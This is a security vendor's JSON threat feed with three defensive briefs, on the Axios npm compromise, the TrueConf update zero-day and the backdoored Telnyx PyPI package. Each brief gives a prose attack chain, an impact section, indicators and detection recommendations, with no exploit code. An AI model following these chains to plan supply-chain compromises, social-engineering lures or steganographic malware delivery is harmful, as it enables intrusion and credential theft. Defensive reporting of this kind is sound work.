{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/supply-chain-attack/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":["UNC1069"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply chain attack","npm","social engineering","rat","unc1069"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn April 4, 2026, the maintainers of the Axios HTTP client disclosed a social engineering attack targeting one of their developers. The attack, attributed to the North Korean threat actor UNC1069, involved impersonating a legitimate company to build trust with the targeted developer. The attacker used a fake Microsoft Teams update disguised as a critical error fix to deploy a remote access trojan (RAT). This RAT allowed the attackers to gain access to the developer\u0026rsquo;s system and npm credentials. The attackers then published two malicious versions of Axios (1.14.1 and 0.30.4) to the npm package registry. These malicious versions included a dependency called plain-crypto-js, which installed a RAT on macOS, Windows, and Linux systems. These versions were available for three hours, posing a supply chain risk to any systems that installed them during that period.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a target developer and initiates contact via LinkedIn/Slack, impersonating a legitimate company.\u003c/li\u003e\n\u003cli\u003eThe attacker invites the developer to a Slack workspace populated with fake profiles and staged company activity.\u003c/li\u003e\n\u003cli\u003eA meeting is scheduled on Microsoft Teams, during which a fake \u0026ldquo;RTC Connection\u0026rdquo; error message is displayed.\u003c/li\u003e\n\u003cli\u003eThe attacker prompts the developer to install a \u0026ldquo;Teams update\u0026rdquo; to resolve the error.\u003c/li\u003e\n\u003cli\u003eThe fake update is a RAT malware, granting the attacker remote access to the developer\u0026rsquo;s machine.\u003c/li\u003e\n\u003cli\u003eThe attacker steals the developer\u0026rsquo;s npm credentials, bypassing MFA due to already authenticated session.\u003c/li\u003e\n\u003cli\u003eThe attacker publishes malicious versions of the Axios package (1.14.1 and 0.30.4) to the npm registry, injecting the plain-crypto-js dependency.\u003c/li\u003e\n\u003cli\u003eSystems installing the compromised Axios versions download and execute the plain-crypto-js package, resulting in RAT deployment and credential theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the Axios npm package created a supply chain attack impacting an unknown number of systems across various sectors. Systems that installed the malicious versions (1.14.1 and 0.30.4) within the three-hour window are considered compromised. Successful exploitation results in the installation of a remote access trojan (RAT) capable of stealing credentials, browser data, and other sensitive information from macOS, Windows, and Linux systems. This can lead to further unauthorized access, data breaches, and potential financial loss.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for the presence of the plain-crypto-js dependency, particularly in projects that use Axios versions 1.14.1 or 0.30.4.\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for npm accounts and other developer accounts, but recognize that authenticated sessions can be hijacked.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious NPM Package Installation\u0026rdquo; to detect potentially malicious package installations based on unusual parent processes (see below).\u003c/li\u003e\n\u003cli\u003eBlock the domain associated with the malicious dependency plain-crypto-js at the DNS resolver.\u003c/li\u003e\n\u003cli\u003eEducate developers about social engineering tactics and the risks of installing software from untrusted sources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T20:30:42Z","date_published":"2026-04-04T20:30:42Z","id":"/briefs/2026-04-axios-npm-hack/","summary":"North Korean threat actors (UNC1069) compromised the Axios npm package by socially engineering a maintainer with a fake Microsoft Teams update delivering a RAT, leading to the injection of a malicious dependency and a supply chain attack.","title":"Axios npm Package Compromised via Social Engineering","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-npm-hack/"},{"_cs_actors":["TrueChaos"],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-3502"}],"_cs_exploited":true,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["trueconf","zero-day","cve-2026-3502","supply-chain attack"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eA threat actor, possibly with Chinese nexus, is exploiting CVE-2026-3502, a zero-day vulnerability in TrueConf versions 8.1.0 through 8.5.2. This vulnerability allows attackers to replace legitimate software updates with malicious variants, leading to arbitrary code execution on connected clients. The attacks, tracked as \u0026ldquo;TrueChaos\u0026rdquo; since the beginning of 2026, have targeted government entities in Southeast Asia. TrueConf, a video conferencing platform popular among military forces, government agencies, oil and gas corporations, and air traffic management companies, saw increased adoption during the COVID-19 pandemic. The attacker exploits the lack of integrity check in the update mechanism to deliver malware disguised as a legitimate TrueConf update. A fix was released in version 8.5.3 in March 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains control of an on-premises TrueConf server.\u003c/li\u003e\n\u003cli\u003eThe attacker replaces the expected update package with a malicious executable file.\u003c/li\u003e\n\u003cli\u003eThe compromised TrueConf server distributes the malicious update to connected clients.\u003c/li\u003e\n\u003cli\u003eClients trust the server-provided update without proper validation and download the malicious file.\u003c/li\u003e\n\u003cli\u003eThe malicious file is executed under the guise of a legitimate TrueConf update, initiating DLL sideloading.\u003c/li\u003e\n\u003cli\u003eReconnaissance tools such as tasklist and tracert are deployed.\u003c/li\u003e\n\u003cli\u003ePrivilege escalation is attempted using UAC bypass via iscsicpl.exe.\u003c/li\u003e\n\u003cli\u003ePersistence is established, and network traffic indicates potential deployment of the Havoc C2 framework for further command execution and payload delivery.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful exploitation of CVE-2026-3502 allows attackers to execute arbitrary code on all TrueConf clients connected to a compromised server. This can lead to widespread malware infections, data theft, and potential compromise of sensitive systems, especially in sectors like government, military, and critical infrastructure that heavily rely on TrueConf for secure communications. The number of affected organizations is potentially high, considering that over 100,000 organizations transitioned to TrueConf during the COVID-19 pandemic.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade TrueConf servers to version 8.5.3 or later to patch CVE-2026-3502.\u003c/li\u003e\n\u003cli\u003eMonitor for the presence of \u003ccode\u003epoweriso.exe\u003c/code\u003e or \u003ccode\u003e7z-x64.dll\u003c/code\u003e on endpoints, as these are strong indicators of compromise.\u003c/li\u003e\n\u003cli\u003eInvestigate systems with suspicious artifacts like \u003ccode\u003e%AppData%\\Roaming\\Adobe\\update.7z\u003c/code\u003e or \u003ccode\u003eiscsiexe.dll\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious TrueConf Update Execution\u0026rdquo; to detect malicious updates executing from the TrueConf directory.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for connections to known Havoc C2 infrastructure.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-02T12:00:00Z","date_published":"2026-04-02T12:00:00Z","id":"/briefs/2026-04-trueconf-zero-day/","summary":"Hackers exploited a zero-day vulnerability (CVE-2026-3502) in TrueConf conference servers to execute arbitrary files on connected endpoints, potentially deploying the Havoc C2 framework.","title":"TrueConf Zero-Day Exploitation Leading to Arbitrary Code Execution","url":"https://feed.craftedsignal.io/briefs/2026-04-trueconf-zero-day/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply chain attack","pypi","credential theft","steganography"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 27, 2026, the Telnyx package on the Python Package Index (PyPI) was compromised by the threat actor TeamPCP. Malicious versions 4.87.1 and 4.87.2 were uploaded, containing credential-stealing malware concealed within WAV audio files. This supply-chain attack targeted developers using the Telnyx Python SDK, a popular package with over 740,000 monthly downloads, used for integrating communication services into applications. The malicious code resides in the \u003ccode\u003etelnyx/_client.py\u003c/code\u003e file and executes upon import. The compromise is believed to have originated from stolen credentials for the publishing account on the PyPI registry. TeamPCP has been linked to previous supply-chain attacks and wiper campaigns against Iranian systems, highlighting the group\u0026rsquo;s focus on disrupting software development and infrastructure.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eTeamPCP gains unauthorized access to the Telnyx PyPI account, likely through credential theft.\u003c/li\u003e\n\u003cli\u003eMalicious versions 4.87.1 and 4.87.2 of the Telnyx package are published to PyPI.\u003c/li\u003e\n\u003cli\u003eWhen a developer installs the compromised Telnyx package, the \u003ccode\u003etelnyx/_client.py\u003c/code\u003e file is executed upon import.\u003c/li\u003e\n\u003cli\u003eOn Linux and macOS, a detached process is spawned to download a second-stage payload disguised as a WAV audio file (\u003ccode\u003eringtone.wav\u003c/code\u003e) from a remote command-and-control (C2) server.\u003c/li\u003e\n\u003cli\u003eSteganography is used to hide malicious code within the WAV file\u0026rsquo;s data frames.\u003c/li\u003e\n\u003cli\u003eThe embedded payload is extracted using an XOR-based decryption routine and executed in memory.\u003c/li\u003e\n\u003cli\u003eThe malware harvests sensitive data, including SSH keys, credentials, cloud tokens, cryptocurrency wallets, and environment variables.\u003c/li\u003e\n\u003cli\u003eIf Kubernetes is present, the malware enumerates cluster secrets and deploys privileged pods to access underlying host systems. On Windows, a different WAV file (\u003ccode\u003ehangup.wav\u003c/code\u003e) is downloaded that extracts and saves an executable named \u003ccode\u003emsbuild.exe\u003c/code\u003e to the startup folder for persistence.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack could result in widespread compromise of systems utilizing the Telnyx Python SDK. Over 740,000 monthly downloads indicate a large potential victim pool. Stolen credentials and secrets can lead to unauthorized access to cloud resources, sensitive data exfiltration, and further lateral movement within compromised networks. For systems running Kubernetes, the attacker could gain control over the entire cluster, leading to significant disruption and data loss. Developers who installed the malicious packages are advised to consider their systems fully compromised and rotate all secrets as soon as possible.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eIdentify and remove Telnyx versions 4.87.1 and 4.87.2 from all environments, reverting to version 4.87.0 as recommended by the vendor.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for processes spawned by Python interpreters (\u003ccode\u003epython.exe\u003c/code\u003e, \u003ccode\u003epython3\u003c/code\u003e) attempting to download files with the \u003ccode\u003e.wav\u003c/code\u003e extension, using the \u0026ldquo;Detect Suspicious Python WAV Download\u0026rdquo; Sigma rule provided below.\u003c/li\u003e\n\u003cli\u003eImplement stricter controls and multi-factor authentication for PyPI accounts used to publish packages to prevent similar supply chain attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Detect msbuild.exe in Startup Folder\u0026rdquo; Sigma rule to identify potential persistence attempts on Windows systems.\u003c/li\u003e\n\u003cli\u003eRotate all secrets and credentials on any system that has imported the malicious Telnyx package.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T12:00:00Z","date_published":"2026-03-28T12:00:00Z","id":"/briefs/2026-03-teampcp-telnyx/","summary":"The TeamPCP threat actor compromised the Telnyx PyPI package, injecting credential-stealing malware hidden within WAV audio files to target Linux, macOS, and Windows systems.","title":"TeamPCP Backdoors Telnyx PyPI Package with Steganographic Malware","url":"https://feed.craftedsignal.io/briefs/2026-03-teampcp-telnyx/"}],"language":"en","title":"CraftedSignal Threat Feed — Supply-Chain Attack","version":"https://jsonfeed.org/version/1.1"}